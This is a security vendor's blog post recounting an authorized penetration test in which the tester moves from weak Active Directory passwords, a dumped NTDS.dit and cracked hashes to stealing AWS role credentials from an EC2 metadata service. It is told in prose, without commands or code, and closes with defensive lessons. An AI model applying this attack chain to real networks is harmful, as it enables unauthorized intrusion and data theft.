Last updated at Wed, 03 Jan 2024 21:05:32 GMT
At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.
Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test included looking at internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps based on NIST’s best practices guide.
I evaluated their external assets but most of the IPs were configured to block unauthorized access. I continued to test but did not gain access to any of the external assets since, with cloud, once access has been blocked from the platform itself there is not a lot that I could do about it. But nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS Apps etc., using company-based keywords. For example: companyx, companyx.IT, companyx.media, etc. Eventually, I found S3 buckets that were publicly available on their external network. These buckets contained sensitive information which definitely was a point of action for the client.
My next step was to complete a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure, including the resources that were running, the roles attached to the resources, the open services, etc. It also provided the customer valuable insights on the security controls that were missing based on the NIST’s best practices guide like the list of unused access keys, unencrypted disk volumes, keys that are not rotated every 90 days, insufficient logging, publicly accessible services like SSH, RDP, and many more. This scan was done using Rapid7’s very own InsightCloudSec tool which provides customers visibility into their cloud network and helps them identify gaps.
When testing the AWS cloud platform with the read-only credentials provided by the customer, I found they were locked with a strong IAM policy which allowed viewing of only cloud resources on the platform. However, there were no weaknesses in the IAM policy after attempts to enumerate vulnerabilities. This will be important later on!
Hardcoded credentials were found in Functions Apps and EC2 instance data but I was unable to utilize this further to escalate privileges. After enumerating the S3 buckets using the read-only credentials multiple S3 buckets containing customer invoices and payment data, along with Infrastructure-as-a-code files were found. This provided information about how the customer managed their automated deployments. Beyond this, we were unable to find any vulnerabilities to escalate privileges, however, all the data accumulated during the phase was kept handy in case there would be a chance to chain vulnerabilities together and gain access during the next phases of the pentest. Although it was frustrating to not be able to find any ways to escalate privileges from the platform itself, enumerating it gave me plenty of understanding about their environment which would prove useful in the next phase.
In the final phase of the test, I tested all of the internal assets that were in-scope. These were primarily windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory Domain controllers on these servers and found that some AD servers allowed for NULL session enumeration which means you could connect to the AD server and dump out all of the domain information like users, groups, and password policies, without authentication.
Password spray attacks were deployed after all the users from the Domain were accessed. Pretty quickly, it was clear there were multiple users using weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This provided plenty of compromised credentials allowing me to go through the access levels provided to these compromised accounts. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD Servers which contained hashes for all the domain users. With this, several accounts with weak passwords were cracked.
With access to multiple accounts in the bag, the only goal left was to gain some sort of access on the AWS platform. With all the data gathered from the AWS cloud platform test, I first looked at the EC2 Instances on the platform and what roles were assigned to each of them. Then I assessed accounts which had admin access. I found an ‘xx-main-ec2-prod’ role attached to an EC2 instance for which I had admin access through one of the compromised accounts. Using RDP to login to the EC2 instance, I pinged the IAM meta-data server and got the temporary AWS credentials for the ‘xx-main-ec2-prod’ role.
With these credentials, I created a new AWS profile and enumerated the permissions associated with this role. The ‘xx-main-ec2-prod’ role had access to list secrets in the AWS account, put and delete objects on all S3 buckets, send OS commands to all EC2 instances in the AWS account, and modify logs, as well. I proceeded to list some secrets in the AWS account to confirm the access that we had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.
In the end, this testing highlights how vast the attack surface would be on the cloud network. Even if you’ve locked down your cloud platform, the infrastructure assets could be vulnerable allowing attackers to compromise them and then laterally move to the cloud network. As organizations move their networks to the cloud, it would be important for them not to simply depend on the cloud platform to secure their network but also ensure that their individual assets are continuously tested and secured.